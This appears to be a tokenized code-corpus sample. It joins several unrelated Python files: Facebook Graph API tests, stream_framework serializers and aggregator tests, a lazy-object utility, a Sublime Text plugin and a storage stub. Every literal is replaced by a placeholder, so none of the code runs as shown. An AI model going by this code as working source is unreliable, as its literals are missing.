MagicMock ( ) <EOL> response = StringIO ( '''<STR_LIT>''' ) <EOL> opener . open . side_effect = HTTPError ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' , '<STR_LIT>' , response ) <EOL> patched . return_value = opener <EOL> def make_request ( ) : <EOL> graph . get ( '<STR_LIT>' ) <EOL> self . assertRaises ( facebook_exceptions . OAuthException , make_request ) <EOL> def test_facebook_down ( self ) : <EOL> '''<STR_LIT>''' <EOL> graph = self . guy . graph ( ) <EOL> with mock . patch ( '<STR_LIT>' ) as patched : <EOL> opener = mock . MagicMock ( ) <EOL> def side_effect ( * args , ** kwargs ) : <EOL> response = StringIO ( u'''<STR_LIT>''' ) <EOL> http_exception = HTTPError ( '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' , '<STR_LIT>' , response ) <EOL> raise http_exception <EOL> opener . open . side_effect = side_effect <EOL> patched . return_value = opener <EOL> def make_request ( ) : <EOL> graph . get ( '<STR_LIT>' ) <EOL> self . assertRaises ( <EOL> facebook_exceptions . FacebookUnreachable , make_request ) <EOL> class TestPublishing ( OpenFacebookTest ) : <EOL> def test_permissions ( self ) : <EOL> graph = self . thi . graph ( ) <EOL> permission_responses = [ <EOL> ( <EOL> { u'<STR_LIT>' : { u'<STR_LIT>' : u'<STR_LIT>' } , u'<STR_LIT:data>' : [ <EOL> { u'<STR_LIT>' : <NUM_LIT:1> , u'<STR_LIT>' : <NUM_LIT:1> , u'<STR_LIT>' : <NUM_LIT:1> , u'<STR_LIT>' : <NUM_LIT:1> , u'<STR_LIT>' : <NUM_LIT:1> , u'<STR_LIT>' : <NUM_LIT:1> , u'<STR_LIT>' : <NUM_LIT:1> , u'<STR_LIT>' : <NUM_LIT:1> , u'<STR_LIT>' : <NUM_LIT:1> , u'<STR_LIT>' : <NUM_LIT:1> , u'<STR_LIT>' : <NUM_LIT:1> } ] } , <EOL> { u'<STR_LIT>' : True , u'<STR_LIT>' : True , u'<STR_LIT>' : True , u'<STR_LIT>' : True , u'<STR_LIT>' : True , u'<STR_LIT>' : True , u'<STR_LIT>' : True , u'<STR_LIT>' : True , u'<STR_LIT>' : True , u'<STR_LIT>' : True , u'<STR_LIT>' : True } ) , <EOL> ( <EOL> { u'<STR_LIT>' : { <EOL> u'<STR_LIT>' : u'<STR_LIT>' } , u'<STR_LIT:data>' : [ ] } , <EOL> { } ) , <EOL> ] <EOL> live_permissions = graph . 
permissions ( ) <EOL> for response , correct_permissions in permission_responses : <EOL> with mock . patch ( '<STR_LIT>' ) as g : <EOL> g . return_value = response <EOL> permissions = graph . permissions ( ) <EOL> self . assertEqual ( permissions , correct_permissions ) <EOL> def test_wallpost ( self ) : <EOL> graph = self . thi . graph ( ) <EOL> now = datetime . datetime . now ( ) <EOL> result = graph . set ( '<STR_LIT>' , message = '<STR_LIT>' % now ) <EOL> self . assertTrue ( result [ '<STR_LIT:id>' ] ) <EOL> graph . delete ( result [ '<STR_LIT:id>' ] ) <EOL> guy_graph = self . guy . graph ( ) <EOL> try : <EOL> guy_graph . set ( '<STR_LIT>' , message = '<STR_LIT>' ) <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> except facebook_exceptions . PermissionException as e : <EOL> pass <EOL> def test_og_follow ( self ) : <EOL> return <EOL> graph = self . thi . graph ( ) <EOL> path = '<STR_LIT>' <EOL> result = graph . set ( path , profile = self . guy . id ) <EOL> self . assertTrue ( result [ '<STR_LIT:id>' ] ) <EOL> remove_path = result [ '<STR_LIT:id>' ] <EOL> deleted = graph . delete ( remove_path ) <EOL> def test_og_adjust ( self ) : <EOL> return <EOL> graph = self . thi . graph ( ) <EOL> path = '<STR_LIT>' <EOL> result = graph . set ( path , profile = self . guy . id ) <EOL> self . assertTrue ( result [ '<STR_LIT:id>' ] ) <EOL> change_result = graph . set ( result [ '<STR_LIT:id>' ] , message = '<STR_LIT>' ) <EOL> assert change_result is True <EOL> def test_og_explicit_share ( self ) : <EOL> return <EOL> graph = self . thi . graph ( ) <EOL> path = '<STR_LIT>' <EOL> result = graph . set ( <EOL> path , profile = self . guy . id , fb__explicitly_shared = '<STR_LIT:true>' ) <EOL> self . assertTrue ( result [ '<STR_LIT:id>' ] ) <EOL> class TestOpenFacebook ( OpenFacebookTest ) : <EOL> def test_cookie_parsing ( self ) : <EOL> cookie = '<STR_LIT>' <EOL> parsed_cookie = FacebookAuthorization . 
parse_signed_data ( cookie ) <EOL> assert '<STR_LIT:code>' in parsed_cookie <EOL> def test_code_conversion ( self ) : <EOL> from open_facebook import exceptions as open_facebook_exceptions <EOL> code = '<STR_LIT>' <EOL> try : <EOL> user_token = FacebookAuthorization . convert_code ( <EOL> code , redirect_uri = '<STR_LIT>' ) <EOL> facebook = OpenFacebook ( user_token [ '<STR_LIT>' ] ) <EOL> facebook . me ( ) <EOL> except open_facebook_exceptions . ParameterException as e : <EOL> pass <EOL> def test_fql ( self ) : <EOL> facebook = self . thi . graph ( ) <EOL> result = facebook . fql ( '<STR_LIT>' ) <EOL> assert '<STR_LIT:name>' in result [ <NUM_LIT:0> ] <EOL> def test_open_api ( self ) : <EOL> facebook = self . guy . graph ( ) <EOL> assert '<STR_LIT:name>' in facebook . me ( ) <EOL> assert facebook . get ( '<STR_LIT>' ) <EOL> def test_albums ( self ) : <EOL> graph = self . guy . graph ( ) <EOL> graph . version = '<STR_LIT>' <EOL> albums = graph . get ( '<STR_LIT>' , fields = '<STR_LIT>' ) [ '<STR_LIT:data>' ] <EOL> album_type_dict = { a [ '<STR_LIT:type>' ] : a for a in albums } <EOL> profile_album = album_type_dict . get ( '<STR_LIT>' ) <EOL> cover_album = album_type_dict . get ( '<STR_LIT>' ) <EOL> if profile_album : <EOL> pictures = graph . get ( '<STR_LIT>' % profile_album [ '<STR_LIT:id>' ] ) [ '<STR_LIT:data>' ] [ : <NUM_LIT:3> ] <EOL> for picture in pictures : <EOL> print ( picture [ '<STR_LIT:source>' ] ) <EOL> if cover_album : <EOL> pictures = graph . get ( '<STR_LIT>' % cover_album [ '<STR_LIT:id>' ] ) [ '<STR_LIT:data>' ] [ : <NUM_LIT:3> ] <EOL> for picture in pictures : <EOL> print ( picture [ '<STR_LIT:source>' ] ) </s>
<s> from stream_framework . activity import Activity <EOL> from stream_framework . exceptions import SerializationException <EOL> from stream_framework . serializers . activity_serializer import ActivitySerializer <EOL> from stream_framework . serializers . utils import check_reserved <EOL> from stream_framework . utils import epoch_to_datetime , datetime_to_epoch <EOL> from stream_framework . serializers . base import BaseAggregatedSerializer <EOL> import six <EOL> class AggregatedActivitySerializer ( BaseAggregatedSerializer ) : <EOL> '''<STR_LIT>''' <EOL> dehydrate = True <EOL> identifier = '<STR_LIT>' <EOL> reserved_characters = [ '<STR_LIT:;>' , '<STR_LIT:U+002C>' , '<STR_LIT>' ] <EOL> date_fields = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> activity_serializer_class = ActivitySerializer <EOL> def dumps ( self , aggregated ) : <EOL> self . check_type ( aggregated ) <EOL> activity_serializer = self . activity_serializer_class ( Activity ) <EOL> parts = [ aggregated . group ] <EOL> check_reserved ( aggregated . group , [ '<STR_LIT>' ] ) <EOL> for date_field in self . date_fields : <EOL> value = getattr ( aggregated , date_field ) <EOL> if value is not None : <EOL> epoch = '<STR_LIT>' % datetime_to_epoch ( value ) <EOL> else : <EOL> epoch = - <NUM_LIT:1> <EOL> parts += [ epoch ] <EOL> serialized_activities = [ ] <EOL> if self . dehydrate : <EOL> if not aggregated . dehydrated : <EOL> aggregated = aggregated . get_dehydrated ( ) <EOL> serialized_activities = map ( str , aggregated . _activity_ids ) <EOL> else : <EOL> for activity in aggregated . activities : <EOL> serialized = activity_serializer . dumps ( activity ) <EOL> check_reserved ( serialized , [ '<STR_LIT:;>' , '<STR_LIT>' ] ) <EOL> serialized_activities . append ( serialized ) <EOL> serialized_activities_part = '<STR_LIT:;>' . join ( serialized_activities ) <EOL> parts . append ( serialized_activities_part ) <EOL> parts . append ( aggregated . 
minimized_activities ) <EOL> serialized_aggregated = '<STR_LIT>' . join ( map ( str , parts ) ) <EOL> serialized = '<STR_LIT>' % ( self . identifier , serialized_aggregated ) <EOL> return serialized <EOL> def loads ( self , serialized_aggregated ) : <EOL> activity_serializer = self . activity_serializer_class ( Activity ) <EOL> try : <EOL> serialized_aggregated = serialized_aggregated [ <NUM_LIT:2> : ] <EOL> parts = serialized_aggregated . split ( '<STR_LIT>' ) <EOL> group = parts [ <NUM_LIT:0> ] <EOL> aggregated = self . aggregated_activity_class ( group ) <EOL> date_dict = dict ( zip ( self . date_fields , parts [ <NUM_LIT:1> : <NUM_LIT:5> ] ) ) <EOL> for k , v in date_dict . items ( ) : <EOL> date_value = None <EOL> if v != '<STR_LIT>' : <EOL> date_value = epoch_to_datetime ( float ( v ) ) <EOL> setattr ( aggregated , k , date_value ) <EOL> serializations = parts [ <NUM_LIT:5> ] . split ( '<STR_LIT:;>' ) <EOL> if self . dehydrate : <EOL> activity_ids = list ( map ( int , serializations ) ) <EOL> aggregated . _activity_ids = activity_ids <EOL> aggregated . dehydrated = True <EOL> else : <EOL> activities = [ activity_serializer . loads ( s ) <EOL> for s in serializations ] <EOL> aggregated . activities = activities <EOL> aggregated . dehydrated = False <EOL> minimized = int ( parts [ <NUM_LIT:6> ] ) <EOL> aggregated . minimized_activities = minimized <EOL> return aggregated <EOL> except Exception as e : <EOL> msg = six . text_type ( e ) <EOL> raise SerializationException ( msg ) <EOL> class NotificationSerializer ( AggregatedActivitySerializer ) : <EOL> dehydrate = False </s>
<s> from __future__ import division <EOL> import datetime <EOL> import unittest <EOL> from stream_framework . aggregators . base import RecentVerbAggregator , NotificationAggregator <EOL> from stream_framework . tests . utils import FakeActivity <EOL> from stream_framework . verbs . base import Love as LoveVerb , Comment as CommentVerb <EOL> def implementation ( meth ) : <EOL> def wrapped_test ( self , * args , ** kwargs ) : <EOL> if self . aggregator_class is None : <EOL> raise unittest . SkipTest ( '<STR_LIT>' ) <EOL> return meth ( self , * args , ** kwargs ) <EOL> return wrapped_test <EOL> class BaseAggregatorTest ( unittest . TestCase ) : <EOL> aggregator_class = None <EOL> first_activities_group = [ ] <EOL> second_activities_group = [ ] <EOL> @ property <EOL> def today ( self ) : <EOL> return datetime . datetime . now ( ) . replace ( minute = <NUM_LIT:0> ) <EOL> @ property <EOL> def yesterday ( self ) : <EOL> return self . today - datetime . timedelta ( days = <NUM_LIT:1> ) <EOL> @ implementation <EOL> def test_aggregate ( self ) : <EOL> aggregator = self . aggregator_class ( ) <EOL> activities = self . first_activities_group + self . second_activities_group <EOL> aggregated = aggregator . aggregate ( activities ) <EOL> self . assertEqual ( len ( aggregated ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( aggregated [ <NUM_LIT:0> ] . activities , self . first_activities_group ) <EOL> self . assertEqual ( aggregated [ <NUM_LIT:1> ] . activities , self . second_activities_group ) <EOL> @ implementation <EOL> def test_empty_merge ( self ) : <EOL> aggregator = self . aggregator_class ( ) <EOL> activities = self . first_activities_group + self . second_activities_group <EOL> new , changed , deleted = aggregator . merge ( [ ] , activities ) <EOL> self . assertEqual ( len ( new ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( new [ <NUM_LIT:0> ] . activities , self . first_activities_group ) <EOL> self . assertEqual ( new [ <NUM_LIT:1> ] . activities , self . 
second_activities_group ) <EOL> self . assertEqual ( len ( changed ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( deleted ) , <NUM_LIT:0> ) <EOL> @ implementation <EOL> def test_merge ( self ) : <EOL> aggregator = self . aggregator_class ( ) <EOL> middle_index = len ( self . first_activities_group ) // <NUM_LIT:2> <EOL> first = aggregator . aggregate ( self . first_activities_group [ : middle_index ] ) <EOL> new , changed , deleted = aggregator . merge ( first , <EOL> self . first_activities_group [ middle_index : ] ) <EOL> self . assertEqual ( len ( new ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( deleted ) , <NUM_LIT:0> ) <EOL> old , updated = changed [ <NUM_LIT:0> ] <EOL> self . assertEqual ( old . activities , self . first_activities_group [ : middle_index ] ) <EOL> self . assertEqual ( updated . activities , self . first_activities_group ) <EOL> class BaseRecentVerbAggregatorTest ( BaseAggregatorTest ) : <EOL> id_seq = list ( range ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> def create_activities ( self , verb , creation_date , count ) : <EOL> return [ FakeActivity ( actor = x , <EOL> verb = verb , <EOL> object = self . id_seq . pop ( ) , <EOL> target = x , <EOL> time = creation_date + datetime . timedelta ( seconds = x ) , <EOL> extra_context = dict ( x = x ) ) <EOL> for x in range ( <NUM_LIT:0> , count ) ] <EOL> class RecentVerbAggregatorVerbTest ( BaseRecentVerbAggregatorTest ) : <EOL> '''<STR_LIT>''' <EOL> aggregator_class = RecentVerbAggregator <EOL> def setUp ( self ) : <EOL> self . first_activities_group = self . create_activities ( LoveVerb , self . today , <NUM_LIT:10> ) <EOL> self . second_activities_group = self . create_activities ( CommentVerb , self . today , <NUM_LIT:5> ) <EOL> class RecentVerbAggregatorDateTest ( BaseRecentVerbAggregatorTest ) : <EOL> '''<STR_LIT>''' <EOL> aggregator_class = RecentVerbAggregator <EOL> def setUp ( self ) : <EOL> self . first_activities_group = self . create_activities ( LoveVerb , self . 
today , <NUM_LIT:10> ) <EOL> self . second_activities_group = self . create_activities ( LoveVerb , self . yesterday , <NUM_LIT:5> ) <EOL> class BaseNotificationAggregatorTest ( BaseAggregatorTest ) : <EOL> first_item_id = <NUM_LIT> <EOL> second_item_id = <NUM_LIT> <EOL> def create_activities ( self , verb , object_id , creation_date , count ) : <EOL> return [ FakeActivity ( actor = x , <EOL> verb = verb , <EOL> object = object_id , <EOL> target = x , <EOL> time = creation_date + datetime . timedelta ( seconds = x ) , <EOL> extra_context = dict ( x = x ) ) <EOL> for x in range ( <NUM_LIT:0> , count ) ] <EOL> class NotificationAggregatorVerbTest ( BaseNotificationAggregatorTest ) : <EOL> '''<STR_LIT>''' <EOL> aggregator_class = NotificationAggregator <EOL> def setUp ( self ) : <EOL> self . first_activities_group = self . create_activities ( LoveVerb , self . first_item_id , self . today , <NUM_LIT:10> ) <EOL> self . second_activities_group = self . create_activities ( CommentVerb , self . first_item_id , self . today , <NUM_LIT:5> ) <EOL> class NotificationAggregatorObjectTest ( BaseNotificationAggregatorTest ) : <EOL> '''<STR_LIT>''' <EOL> aggregator_class = NotificationAggregator <EOL> def setUp ( self ) : <EOL> self . first_activities_group = self . create_activities ( LoveVerb , self . first_item_id , self . today , <NUM_LIT:10> ) <EOL> self . second_activities_group = self . create_activities ( LoveVerb , self . second_item_id , self . today , <NUM_LIT:5> ) <EOL> class NotificationAggregatorDateTest ( BaseNotificationAggregatorTest ) : <EOL> '''<STR_LIT>''' <EOL> aggregator_class = NotificationAggregator <EOL> def setUp ( self ) : <EOL> self . first_activities_group = self . create_activities ( LoveVerb , self . first_item_id , self . today , <NUM_LIT:10> ) <EOL> self . second_activities_group = self . create_activities ( LoveVerb , self . first_item_id , self . yesterday , <NUM_LIT:5> ) </s>
<s> import copy <EOL> import operator <EOL> from functools import wraps <EOL> import sys <EOL> import six <EOL> class Promise ( object ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def lazy ( func , * resultclasses ) : <EOL> """<STR_LIT>""" <EOL> @ total_ordering <EOL> class __proxy__ ( Promise ) : <EOL> """<STR_LIT>""" <EOL> __dispatch = None <EOL> def __init__ ( self , args , kw ) : <EOL> self . __args = args <EOL> self . __kw = kw <EOL> if self . __dispatch is None : <EOL> self . __prepare_class__ ( ) <EOL> def __reduce__ ( self ) : <EOL> return ( <EOL> _lazy_proxy_unpickle , <EOL> ( func , self . __args , self . __kw ) + resultclasses <EOL> ) <EOL> @ classmethod <EOL> def __prepare_class__ ( cls ) : <EOL> cls . __dispatch = { } <EOL> for resultclass in resultclasses : <EOL> cls . __dispatch [ resultclass ] = { } <EOL> for type_ in reversed ( resultclass . mro ( ) ) : <EOL> for ( k , v ) in type_ . __dict__ . items ( ) : <EOL> meth = cls . __promise__ ( resultclass , k , v ) <EOL> if hasattr ( cls , k ) : <EOL> continue <EOL> setattr ( cls , k , meth ) <EOL> cls . _delegate_bytes = bytes in resultclasses <EOL> cls . _delegate_text = six . text_type in resultclasses <EOL> assert not ( <EOL> cls . _delegate_bytes and cls . _delegate_text ) , "<STR_LIT>" <EOL> if cls . _delegate_text : <EOL> if six . PY3 : <EOL> cls . __str__ = cls . __text_cast <EOL> else : <EOL> cls . __unicode__ = cls . __text_cast <EOL> elif cls . _delegate_bytes : <EOL> if six . PY3 : <EOL> cls . __bytes__ = cls . __bytes_cast <EOL> else : <EOL> cls . __str__ = cls . __bytes_cast <EOL> @ classmethod <EOL> def __promise__ ( cls , klass , funcname , method ) : <EOL> def __wrapper__ ( self , * args , ** kw ) : <EOL> res = func ( * self . __args , ** self . __kw ) <EOL> for t in type ( res ) . mro ( ) : <EOL> if t in self . __dispatch : <EOL> return self . __dispatch [ t ] [ funcname ] ( res , * args , ** kw ) <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if klass not in cls . __dispatch : <EOL> cls . 
__dispatch [ klass ] = { } <EOL> cls . __dispatch [ klass ] [ funcname ] = method <EOL> return __wrapper__ <EOL> def __text_cast ( self ) : <EOL> return func ( * self . __args , ** self . __kw ) <EOL> def __bytes_cast ( self ) : <EOL> return bytes ( func ( * self . __args , ** self . __kw ) ) <EOL> def __cast ( self ) : <EOL> if self . _delegate_bytes : <EOL> return self . __bytes_cast ( ) <EOL> elif self . _delegate_text : <EOL> return self . __text_cast ( ) <EOL> else : <EOL> return func ( * self . __args , ** self . __kw ) <EOL> def __ne__ ( self , other ) : <EOL> if isinstance ( other , Promise ) : <EOL> other = other . __cast ( ) <EOL> return self . __cast ( ) != other <EOL> def __eq__ ( self , other ) : <EOL> if isinstance ( other , Promise ) : <EOL> other = other . __cast ( ) <EOL> return self . __cast ( ) == other <EOL> def __lt__ ( self , other ) : <EOL> if isinstance ( other , Promise ) : <EOL> other = other . __cast ( ) <EOL> return self . __cast ( ) < other <EOL> def __hash__ ( self ) : <EOL> return hash ( self . __cast ( ) ) <EOL> def __mod__ ( self , rhs ) : <EOL> if self . _delegate_bytes and six . PY2 : <EOL> return bytes ( self ) % rhs <EOL> elif self . _delegate_text : <EOL> return six . text_type ( self ) % rhs <EOL> return self . __cast ( ) % rhs <EOL> def __deepcopy__ ( self , memo ) : <EOL> memo [ id ( self ) ] = self <EOL> return self <EOL> @ wraps ( func ) <EOL> def __wrapper__ ( * args , ** kw ) : <EOL> return __proxy__ ( args , kw ) <EOL> return __wrapper__ <EOL> def _lazy_proxy_unpickle ( func , args , kwargs , * resultclasses ) : <EOL> return lazy ( func , * resultclasses ) ( * args , ** kwargs ) <EOL> def allow_lazy ( func , * resultclasses ) : <EOL> """<STR_LIT>""" <EOL> @ wraps ( func ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> for arg in list ( args ) + list ( six . 
itervalues ( kwargs ) ) : <EOL> if isinstance ( arg , Promise ) : <EOL> break <EOL> else : <EOL> return func ( * args , ** kwargs ) <EOL> return lazy ( func , * resultclasses ) ( * args , ** kwargs ) <EOL> return wrapper <EOL> empty = object ( ) <EOL> def new_method_proxy ( func ) : <EOL> def inner ( self , * args ) : <EOL> if self . _wrapped is empty : <EOL> self . _setup ( ) <EOL> return func ( self . _wrapped , * args ) <EOL> return inner <EOL> class LazyObject ( object ) : <EOL> """<STR_LIT>""" <EOL> _wrapped = None <EOL> def __init__ ( self ) : <EOL> self . _wrapped = empty <EOL> __getattr__ = new_method_proxy ( getattr ) <EOL> def __setattr__ ( self , name , value ) : <EOL> if name == "<STR_LIT>" : <EOL> self . __dict__ [ "<STR_LIT>" ] = value <EOL> else : <EOL> if self . _wrapped is empty : <EOL> self . _setup ( ) <EOL> setattr ( self . _wrapped , name , value ) <EOL> def __delattr__ ( self , name ) : <EOL> if name == "<STR_LIT>" : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if self . _wrapped is empty : <EOL> self . _setup ( ) <EOL> delattr ( self . _wrapped , name ) <EOL> def _setup ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( <EOL> '<STR_LIT>' ) <EOL> def __getstate__ ( self ) : <EOL> if self . _wrapped is empty : <EOL> self . _setup ( ) <EOL> return self . _wrapped . __dict__ <EOL> @ classmethod <EOL> def __newobj__ ( cls , * args ) : <EOL> return cls . __new__ ( cls , * args ) <EOL> def __reduce_ex__ ( self , proto ) : <EOL> if proto >= <NUM_LIT:2> : <EOL> return ( self . __newobj__ , ( self . __class__ , ) , self . __getstate__ ( ) ) <EOL> else : <EOL> return ( copyreg . _reconstructor , ( self . __class__ , object , None ) , self . __getstate__ ( ) ) <EOL> def __deepcopy__ ( self , memo ) : <EOL> if self . _wrapped is empty : <EOL> result = type ( self ) ( ) <EOL> memo [ id ( self ) ] = result <EOL> return result <EOL> return copy . deepcopy ( self . _wrapped , memo ) <EOL> if six . 
PY3 : <EOL> __bytes__ = new_method_proxy ( bytes ) <EOL> __str__ = new_method_proxy ( str ) <EOL> __bool__ = new_method_proxy ( bool ) <EOL> else : <EOL> __str__ = new_method_proxy ( str ) <EOL> __unicode__ = new_method_proxy ( unicode ) <EOL> __nonzero__ = new_method_proxy ( bool ) <EOL> __dir__ = new_method_proxy ( dir ) <EOL> __class__ = property ( new_method_proxy ( operator . attrgetter ( "<STR_LIT>" ) ) ) <EOL> __eq__ = new_method_proxy ( operator . eq ) <EOL> __ne__ = new_method_proxy ( operator . ne ) <EOL> __hash__ = new_method_proxy ( hash ) <EOL> __getitem__ = new_method_proxy ( operator . getitem ) <EOL> __setitem__ = new_method_proxy ( operator . setitem ) <EOL> __delitem__ = new_method_proxy ( operator . delitem ) <EOL> __len__ = new_method_proxy ( len ) <EOL> __contains__ = new_method_proxy ( operator . contains ) <EOL> _super = super <EOL> class SimpleLazyObject ( LazyObject ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , func ) : <EOL> """<STR_LIT>""" <EOL> self . __dict__ [ '<STR_LIT>' ] = func <EOL> _super ( SimpleLazyObject , self ) . __init__ ( ) <EOL> def _setup ( self ) : <EOL> self . _wrapped = self . _setupfunc ( ) <EOL> def __repr__ ( self ) : <EOL> if self . _wrapped is empty : <EOL> repr_attr = self . _setupfunc <EOL> else : <EOL> repr_attr = self . _wrapped <EOL> return '<STR_LIT>' % ( type ( self ) . __name__ , repr_attr ) <EOL> def __deepcopy__ ( self , memo ) : <EOL> if self . _wrapped is empty : <EOL> result = SimpleLazyObject ( self . _setupfunc ) <EOL> memo [ id ( self ) ] = result <EOL> return result <EOL> return copy . deepcopy ( self . _wrapped , memo ) <EOL> class lazy_property ( property ) : <EOL> """<STR_LIT>""" <EOL> def __new__ ( cls , fget = None , fset = None , fdel = None , doc = None ) : <EOL> if fget is not None : <EOL> @ wraps ( fget ) <EOL> def fget ( instance , instance_type = None , name = fget . 
__name__ ) : <EOL> return getattr ( instance , name ) ( ) <EOL> if fset is not None : <EOL> @ wraps ( fset ) <EOL> def fset ( instance , value , name = fset . __name__ ) : <EOL> return getattr ( instance , name ) ( value ) <EOL> if fdel is not None : <EOL> @ wraps ( fdel ) <EOL> def fdel ( instance , name = fdel . __name__ ) : <EOL> return getattr ( instance , name ) ( ) <EOL> return property ( fget , fset , fdel , doc ) <EOL> if sys . version_info >= ( <NUM_LIT:2> , <NUM_LIT:7> , <NUM_LIT:2> ) : <EOL> from functools import total_ordering <EOL> else : <EOL> def total_ordering ( cls ) : <EOL> """<STR_LIT>""" <EOL> convert = { <EOL> '<STR_LIT>' : [ ( '<STR_LIT>' , lambda self , other : not ( self < other or self == other ) ) , <EOL> ( '<STR_LIT>' , lambda self , other : <EOL> self < other or self == other ) , <EOL> ( '<STR_LIT>' , lambda self , other : not self < other ) ] , <EOL> '<STR_LIT>' : [ ( '<STR_LIT>' , lambda self , other : not self <= other or self == other ) , <EOL> ( '<STR_LIT>' , lambda self , other : <EOL> self <= other and not self == other ) , <EOL> ( '<STR_LIT>' , lambda self , other : not self <= other ) ] , <EOL> '<STR_LIT>' : [ ( '<STR_LIT>' , lambda self , other : not ( self > other or self == other ) ) , <EOL> ( '<STR_LIT>' , lambda self , other : <EOL> self > other or self == other ) , <EOL> ( '<STR_LIT>' , lambda self , other : not self > other ) ] , <EOL> '<STR_LIT>' : [ ( '<STR_LIT>' , lambda self , other : ( not self >= other ) or self == other ) , <EOL> ( '<STR_LIT>' , lambda self , other : <EOL> self >= other and not self == other ) , <EOL> ( '<STR_LIT>' , lambda self , other : not self >= other ) ] <EOL> } <EOL> roots = set ( dir ( cls ) ) & set ( convert ) <EOL> if not roots : <EOL> raise ValueError ( <EOL> '<STR_LIT>' ) <EOL> root = max ( roots ) <EOL> for opname , opfunc in convert [ root ] : <EOL> if opname not in roots : <EOL> opfunc . __name__ = opname <EOL> opfunc . __doc__ = getattr ( int , opname ) . 
__doc__ <EOL> setattr ( cls , opname , opfunc ) <EOL> return cls </s>
<s> import unittest <EOL> import logging <EOL> logging . basicConfig ( level = logging . DEBUG ) <EOL> class CubeTestCase ( unittest . TestCase ) : <EOL> pass </s>
<s> import sublime , sublime_plugin <EOL> import re <EOL> common = { "<STR_LIT>" : [ "<STR_LIT:true>" , "<STR_LIT:false>" ] , <EOL> "<STR_LIT>" : [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> "<STR_LIT>" : [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> "<STR_LIT>" : [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : [ "<STR_LIT>" , "<STR_LIT>" ] , <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] <EOL> } <EOL> tss_data = """<STR_LIT>""" <EOL> def parse_tss_data ( data ) : <EOL> props = { } <EOL> for l in data . splitlines ( ) : <EOL> if l == "<STR_LIT>" : <EOL> continue <EOL> names , values = l . split ( '<STR_LIT:=>' ) <EOL> allowed_values = [ ] <EOL> for v in values . split ( '<STR_LIT:|>' ) : <EOL> v = v . strip ( ) <EOL> if v [ <NUM_LIT:0> ] == '<STR_LIT:<>' and v [ - <NUM_LIT:1> ] == '<STR_LIT:>>' : <EOL> key = v [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> if key in common : <EOL> allowed_values += common [ key ] <EOL> else : <EOL> allowed_values . append ( v ) <EOL> for e in names . split ( ) : <EOL> if e [ <NUM_LIT:0> ] == '<STR_LIT:">' : <EOL> props [ e [ <NUM_LIT:1> : - <NUM_LIT:1> ] ] = sorted ( allowed_values ) <EOL> else : <EOL> break <EOL> return props <EOL> class TSSCompletions ( sublime_plugin . EventListener ) : <EOL> props = None <EOL> rex = None <EOL> def on_query_completions ( self , view , prefix , locations ) : <EOL> if not view . match_selector ( locations [ <NUM_LIT:0> ] , "<STR_LIT>" ) : <EOL> return [ ] <EOL> if not self . props : <EOL> self . props = parse_tss_data ( tss_data ) <EOL> self . rex = re . 
compile ( "<STR_LIT>" ) <EOL> l = [ ] <EOL> if ( view . match_selector ( locations [ <NUM_LIT:0> ] , "<STR_LIT>" ) or <EOL> view . match_selector ( locations [ <NUM_LIT:0> ] - <NUM_LIT:1> , "<STR_LIT>" ) ) : <EOL> loc = locations [ <NUM_LIT:0> ] - len ( prefix ) <EOL> line = view . substr ( sublime . Region ( view . line ( loc ) . begin ( ) , loc ) ) <EOL> m = re . search ( self . rex , line ) <EOL> if m : <EOL> prop_name = m . group ( <NUM_LIT:1> ) <EOL> if prop_name in self . props : <EOL> values = self . props [ prop_name ] <EOL> add_semi_colon = view . substr ( sublime . Region ( locations [ <NUM_LIT:0> ] , locations [ <NUM_LIT:0> ] + <NUM_LIT:1> ) ) != '<STR_LIT:U+002C>' <EOL> for v in values : <EOL> desc = v <EOL> snippet = v <EOL> if add_semi_colon : <EOL> snippet += "<STR_LIT:U+002C>" <EOL> if snippet . find ( "<STR_LIT>" ) != - <NUM_LIT:1> : <EOL> desc = desc . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> l . append ( ( desc , snippet ) ) <EOL> return ( l , sublime . INHIBIT_WORD_COMPLETIONS ) <EOL> return None <EOL> else : <EOL> add_colon = not view . match_selector ( locations [ <NUM_LIT:0> ] , "<STR_LIT>" ) <EOL> for p in self . props : <EOL> if add_colon : <EOL> l . append ( ( p , p + "<STR_LIT>" ) ) <EOL> else : <EOL> l . append ( ( p , p ) ) <EOL> return ( l , sublime . INHIBIT_WORD_COMPLETIONS ) </s>
<s> def storage ( conf = None ) : <EOL> from hm . storage import MongoDBStorage <EOL> return MongoDBStorage ( conf ) <EOL> class BaseModel ( object ) : <EOL> def storage ( self ) : <EOL> return storage ( self . config ) </s>
